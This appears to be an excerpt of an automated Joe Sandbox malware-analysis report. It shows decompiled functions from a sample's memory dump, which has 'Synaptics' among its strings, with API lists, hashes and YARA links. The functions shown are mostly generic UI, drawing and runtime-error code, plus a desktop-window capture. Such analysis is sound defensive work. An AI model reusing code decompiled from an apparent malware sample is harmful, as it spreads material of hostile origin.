                                                    • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                    • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                    • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004047C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E004047C0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x49e04c == 0) {
					if( *0x49b034 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
						 *0x49e238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
				}
			}





                                                    0x004047c8
                                                    0x00404828
                                                    0x00404838
                                                    0x00404838
                                                    0x0040483e
                                                    0x004047ca
                                                    0x004047d3
                                                    0x004047e3
                                                    0x004047e3
                                                    0x004047ff
                                                    0x00404820
                                                    0x00404820

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                    • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                    • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                    • MessageBoxA.USER32 ref: 00404838
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$Message
                                                    • String ID: Error$Runtime error at 00000000
                                                    • API String ID: 1570097196-2970929446
                                                    • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                    • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00448030 Relevance: 12.2, APIs: 8, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 39%
                                                    			E00448030(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				intOrPtr _t85;
				intOrPtr _t96;
				void* _t117;
				void* _t118;
				void* _t127;
				struct HDC__* _t136;
				struct HDC__* _t137;
				intOrPtr* _t138;
				void* _t139;

				_t119 = __ecx;
				_t135 = __ecx;
				_v8 = __edx;
				_t118 = __eax;
				_t46 = E00447BD0(__eax);
				if(_t46 != 0) {
					_t142 = _a4;
					if(_a4 == 0) {
						__eflags =  *((intOrPtr*)(_t118 + 0x54));
						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
							_t138 = E00429914(1);
							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
							E0042AD38(_t138, 1);
							 *((intOrPtr*)( *_t138 + 0x40))();
							_t119 =  *_t138;
							 *((intOrPtr*)( *_t138 + 0x34))();
						}
						E004255DC( *((intOrPtr*)(E00429EDC( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
						E00419804( *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
						_push( &_v44);
						_t57 = E00429EDC( *((intOrPtr*)(_t118 + 0x54)));
						_pop(_t127);
						E00425980(_t57, _t127);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54)))));
						_push(_v8);
						_push(E00447D0C(_t118));
						L0042C454();
						E00419804(_a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
						_v12 = E00425C68(E00429EDC( *((intOrPtr*)(_t118 + 0x54))));
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
						_t136 = E00425C68(_t135);
						SetTextColor(_t136, 0xffffff);
						SetBkColor(_t136, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12 + 1);
						_t85 = _a16 + 1;
						__eflags = _t85;
						_push(_t85);
						_push(_t136);
						L004072B8();
						E004255DC( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000010, _t135, _t139, _t85);
						_t137 = E00425C68(_t135);
						SetTextColor(_t137, 0xffffff);
						SetBkColor(_t137, 0);
						_push(0xe20746);
						_push(0);
						_push(0);
						_push(_v12);
						_push( *((intOrPtr*)(_t118 + 0x30)));
						_push( *((intOrPtr*)(_t118 + 0x34)));
						_push(_a12);
						_t96 = _a16;
						_push(_t96);
						_push(_t137);
						L004072B8();
						return _t96;
					}
					_push(_a8);
					_push(E00447A20(_t142));
					E00448008(_t118, _t142);
					_push(E00447A20(_t142));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(E00425C68(__ecx));
					_push(_v8);
					_t117 = E00447D0C(_t118);
					_push(_t117);
					L0042C454();
					return _t117;
				}
				return _t46;
			}




















                                                    0x00448030
                                                    0x00448039
                                                    0x0044803b
                                                    0x0044803e
                                                    0x00448042
                                                    0x00448049
                                                    0x0044804f
                                                    0x00448053
                                                    0x00448099
                                                    0x0044809d
                                                    0x004480ab
                                                    0x004480ad
                                                    0x004480b4
                                                    0x004480c0
                                                    0x004480c8
                                                    0x004480ca
                                                    0x004480ca
                                                    0x004480dd
                                                    0x004480f1
                                                    0x004480f9
                                                    0x004480fd
                                                    0x00448102
                                                    0x00448103
                                                    0x00448108
                                                    0x0044810a
                                                    0x0044810c
                                                    0x0044810e
                                                    0x00448110
                                                    0x00448112
                                                    0x00448114
                                                    0x00448123
                                                    0x00448127
                                                    0x0044812f
                                                    0x00448130
                                                    0x0044814c
                                                    0x0044815e
                                                    0x00448169
                                                    0x00448175
                                                    0x0044817d
                                                    0x00448185
                                                    0x0044818a
                                                    0x0044818f
                                                    0x00448191
                                                    0x00448196
                                                    0x0044819a
                                                    0x0044819e
                                                    0x004481a3
                                                    0x004481a7
                                                    0x004481a7
                                                    0x004481a8
                                                    0x004481a9
                                                    0x004481aa
                                                    0x004481b7
                                                    0x004481c3
                                                    0x004481cb
                                                    0x004481d3
                                                    0x004481d8
                                                    0x004481dd
                                                    0x004481df
                                                    0x004481e4
                                                    0x004481e8
                                                    0x004481ec
                                                    0x004481f0
                                                    0x004481f1
                                                    0x004481f4
                                                    0x004481f5
                                                    0x004481f6
                                                    0x00000000
                                                    0x004481f6
                                                    0x00448058
                                                    0x00448061
                                                    0x00448064
                                                    0x0044806e
                                                    0x0044806f
                                                    0x00448071
                                                    0x00448076
                                                    0x0044807a
                                                    0x00448082
                                                    0x00448086
                                                    0x00448089
                                                    0x0044808e
                                                    0x0044808f
                                                    0x00000000
                                                    0x0044808f
                                                    0x00448201

                                                    APIs
                                                    • 739F2430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                    • 739F2430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                    • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                    • 733B97E0.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746,00000000,00000000,00000000,00FFFFFF,00000000,?,00000000), ref: 004481AA
                                                      • Part of subcall function 00448008: 739F2240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ColorF2430$F2240Text
                                                    • String ID:
                                                    • API String ID: 314387739-0
                                                    • Opcode ID: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                    • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                    • Opcode Fuzzy Hash: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                    • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004751FC Relevance: 12.1, APIs: 8, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E004751FC() {
				void* _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebp;
				signed int _t20;
				short _t34;
				intOrPtr* _t39;
				short* _t51;
				signed int _t52;
				short _t53;
				struct tagRECT* _t54;

				GetWindowRect(GetDesktopWindow(), _t54);
				_t39 = E00429914(1);
				 *((intOrPtr*)( *_t39 + 0x40))();
				_t20 =  *((intOrPtr*)( *_t39 + 0x34))();
				_push(0);
				L00407638();
				_t52 = _t20;
				_push(0x26);
				_push(_t52);
				L00407380();
				if((_t20 & 0x00000100) == 0x100) {
					_t51 = E0040275C(0x404);
					E004032B4(_t51, 0x404);
					 *_t51 = 0x300;
					_t6 = _t51 + 4; // 0x4
					_t34 = _t6;
					_push(_t34);
					_push(0x100);
					_push(0);
					_push(_t52);
					L004073C0();
					_t53 = _t34;
					 *((short*)(_t51 + 2)) = _t53;
					if(_t53 != 0) {
						L00407308();
						 *((intOrPtr*)( *_t39 + 0x38))(_t51);
					}
					E0040277C(_t51);
				}
				_push(0xcc0020);
				_push(0);
				_push(0);
				_push(_t52);
				_push(_v32 - _v40);
				_push(_v36 - _v44);
				_push(0);
				_push(0);
				_push(E00425C68(E00429EDC(_t39)));
				L004072B8();
				_push(_t52);
				_push(0);
				L00407888();
				return _t39;
			}


















                                                    0x0047520a
                                                    0x0047521b
                                                    0x00475228
                                                    0x00475237
                                                    0x0047523a
                                                    0x0047523c
                                                    0x00475241
                                                    0x00475243
                                                    0x00475245
                                                    0x00475246
                                                    0x00475255
                                                    0x00475261
                                                    0x0047526c
                                                    0x00475271
                                                    0x00475276
                                                    0x00475276
                                                    0x00475279
                                                    0x0047527a
                                                    0x0047527f
                                                    0x00475281
                                                    0x00475282
                                                    0x00475287
                                                    0x00475289
                                                    0x00475290
                                                    0x00475293
                                                    0x0047529e
                                                    0x0047529e
                                                    0x004752a3
                                                    0x004752a3
                                                    0x004752a8
                                                    0x004752ad
                                                    0x004752af
                                                    0x004752b1
                                                    0x004752ba
                                                    0x004752c3
                                                    0x004752c4
                                                    0x004752c6
                                                    0x004752d4
                                                    0x004752d5
                                                    0x004752da
                                                    0x004752db
                                                    0x004752dd
                                                    0x004752eb

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00475204
                                                    • GetWindowRect.USER32 ref: 0047520A
                                                    • 733AAC50.USER32(00000000), ref: 0047523C
                                                    • 733AAD70.GDI32(00000000,00000026,00000000), ref: 00475246
                                                    • 733AAEF0.GDI32(00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475282
                                                    • 733AA8F0.GDI32(00000000,00000000,00000000,00000100,00000004,00000000,00000026,00000000), ref: 00475293
                                                    • 733B97E0.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752D5
                                                    • 733AB380.USER32(00000000,00000000,00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752DD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$B380DesktopRect
                                                    • String ID:
                                                    • API String ID: 2454875651-0
                                                    • Opcode ID: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                    • Opcode Fuzzy Hash: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004265A0 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 26%
                                                    			E004265A0(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004029DC(_t24, 0x40,  &_v1032);
				_push(0);
				L00407638();
				_v8 = _t25;
				_push(_t54);
				_push(0x42669d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00407380();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L004073C0();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L004073C0();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L004073C0();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L004073C0();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(0x4266a4);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407888();
				return _t29;
			}

















                                                    0x004265a1
                                                    0x004265aa
                                                    0x004265b3
                                                    0x004265c7
                                                    0x004265cc
                                                    0x004265ce
                                                    0x004265d3
                                                    0x004265d8
                                                    0x004265d9
                                                    0x004265de
                                                    0x004265e1
                                                    0x004265e4
                                                    0x004265e6
                                                    0x004265e9
                                                    0x004265ea
                                                    0x004265ef
                                                    0x004265f4
                                                    0x00426600
                                                    0x00426601
                                                    0x00426603
                                                    0x00426608
                                                    0x00426609
                                                    0x00426618
                                                    0x00426674
                                                    0x00426675
                                                    0x0042667a
                                                    0x0042667e
                                                    0x0042667f
                                                    0x0042661a
                                                    0x00426620
                                                    0x00426621
                                                    0x00426628
                                                    0x0042662c
                                                    0x0042662d
                                                    0x00426640
                                                    0x00426641
                                                    0x00426646
                                                    0x0042664a
                                                    0x0042664b
                                                    0x00426656
                                                    0x00426657
                                                    0x00426659
                                                    0x0042665e
                                                    0x0042665f
                                                    0x0042665f
                                                    0x00426618
                                                    0x00426686
                                                    0x00426689
                                                    0x0042668c
                                                    0x00426691
                                                    0x00426694
                                                    0x00426695
                                                    0x00426697
                                                    0x0042669c

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 004265CE
                                                    • 733AAD70.GDI32(?,00000068,00000000,0042669D,?,00000000), ref: 004265EA
                                                    • 733AAEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 00426609
                                                    • 733AAEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042662D
                                                    • 733AAEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D), ref: 0042664B
                                                    • 733AAEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0042665F
                                                    • 733AAEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042667F
                                                    • 733AB380.USER32(00000000,?,004266A4,0042669D,?,00000000), ref: 00426697
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380
                                                    • String ID:
                                                    • API String ID: 120756276-0
                                                    • Opcode ID: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                    • Opcode Fuzzy Hash: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044A960 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x44abbb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x44abc2);
					E004049C0( &_v68);
					return E004049C0( &_v12);
				}
				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044C8DC(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
							_t103 = E0044C8DC(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
							} else {
								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0044CE98(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E00404E80(_v12);
							if(E0044C8DC(_t154) > 0) {
								_v61.hSubMenu = E0044AE70(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x44abd4);
						E00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404D40();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x449854; // 0x4498a0
					_t149 = E00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044AE70(_t154);
				goto L8;
			}





















                                                    0x0044a960
                                                    0x0044a96b
                                                    0x0044a96e
                                                    0x0044a971
                                                    0x0044a974
                                                    0x0044a976
                                                    0x0044a97a
                                                    0x0044a97b
                                                    0x0044a980
                                                    0x0044a983
                                                    0x0044a98a
                                                    0x0044ab9d
                                                    0x0044ab9f
                                                    0x0044aba2
                                                    0x0044aba5
                                                    0x0044abad
                                                    0x0044abba
                                                    0x0044abba
                                                    0x0044a996
                                                    0x0044a9a4
                                                    0x0044a9b2
                                                    0x0044a9b7
                                                    0x0044a9fc
                                                    0x0044aa0a
                                                    0x0044ab56
                                                    0x0044ab5e
                                                    0x0044ab63
                                                    0x0044ab65
                                                    0x0044ab98
                                                    0x0044ab67
                                                    0x0044ab6a
                                                    0x0044ab7f
                                                    0x0044ab7f
                                                    0x00000000
                                                    0x0044ab65
                                                    0x0044aa10
                                                    0x0044aa17
                                                    0x0044aa25
                                                    0x0044aa29
                                                    0x0044aa40
                                                    0x0044aa4e
                                                    0x0044aa4e
                                                    0x00000000
                                                    0x0044aa4e
                                                    0x0044aa4a
                                                    0x0044aa4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044aa52
                                                    0x0044aa52
                                                    0x0044aa52
                                                    0x0044aa54
                                                    0x0044aa54
                                                    0x0044aaa3
                                                    0x0044aaca
                                                    0x0044aad1
                                                    0x0044aad6
                                                    0x0044aadb
                                                    0x0044aae0
                                                    0x0044aaeb
                                                    0x0044aaf7
                                                    0x0044ab00
                                                    0x0044ab00
                                                    0x0044ab0c
                                                    0x00000000
                                                    0x0044ab0c
                                                    0x0044aa29
                                                    0x0044a9b9
                                                    0x0044a9bc
                                                    0x0044a9be
                                                    0x0044a9d8
                                                    0x0044a9d8
                                                    0x0044a9db
                                                    0x0044a9e7
                                                    0x0044a9ec
                                                    0x0044a9f7
                                                    0x00000000
                                                    0x0044a9f7
                                                    0x0044a9c0
                                                    0x0044a9c4
                                                    0x00000000
                                                    0x00000000
                                                    0x0044a9c9
                                                    0x0044a9cf
                                                    0x0044a9d4
                                                    0x0044a9d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044a9d6
                                                    0x0044a9ad
                                                    0x00000000

                                                    APIs
                                                    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                    • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                      • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$CreateInsertItemPopupVersion
                                                    • String ID: ,$?
                                                    • API String ID: 133695497-2308483597
                                                    • Opcode ID: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                    • Opcode Fuzzy Hash: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00442BD0 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x49de0c; // 0x49ebbc
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x442da9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0043AFAC(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0043C1D4(_v8,  &_v28);
				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00458218() -  *(_v8 + 0x4c);
				}
				if(E00458224() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00458224() -  *(_v8 + 0x48);
				}
				if(E0045820C() > _v28) {
					_v28 = E0045820C();
				}
				if(E00458200() > _v16) {
					_v16 = E00458200();
				}
				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
